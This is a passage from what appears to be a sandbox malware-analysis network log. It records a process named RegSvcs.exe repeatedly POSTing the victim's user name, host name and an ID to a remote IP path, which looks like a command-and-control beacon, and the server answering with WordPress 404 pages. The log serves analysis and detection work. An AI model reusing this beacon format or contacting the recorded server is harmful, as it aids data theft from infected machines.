                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:46.838907003 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:49.354408979 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:47 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:49.354433060 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:43:49.354441881 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:43:49.354453087 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:43:49.354482889 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:43:49.354495049 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                                            Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                                            May 29, 2024 15:43:49.354505062 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                                            Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                                            May 29, 2024 15:43:49.354515076 CEST1236INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                                            Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
                                            May 29, 2024 15:43:49.354525089 CEST1236INData Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                                            Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
                                            May 29, 2024 15:43:49.354535103 CEST1236INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                                            Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            38192.168.2.94975345.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:49.526859999 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:49.531759977 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:52.027256966 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:50 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:52.027296066 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:43:52.027306080 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:43:52.027326107 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:43:52.027338982 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:43:52.027350903 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:43:52.027360916 CEST1236INData Raw: 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64
                                            Data Ascii: near-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(13
                                            May 29, 2024 15:43:52.027373075 CEST896INData Raw: 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74
                                            Data Ascii: ed: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}body .
                                            May 29, 2024 15:43:52.028398037 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:43:52.028415918 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            39192.168.2.94975445.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:43:52.300724030 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:43:52.306535959 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:43:54.843964100 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:43:52 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:43:54.843986034 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:43:54.844032049 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:43:54.844078064 CEST224INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener(
                                            May 29, 2024 15:43:54.844088078 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:43:54.844151974 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:43:54.844172001 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:43:54.844192028 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:43:54.844204903 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
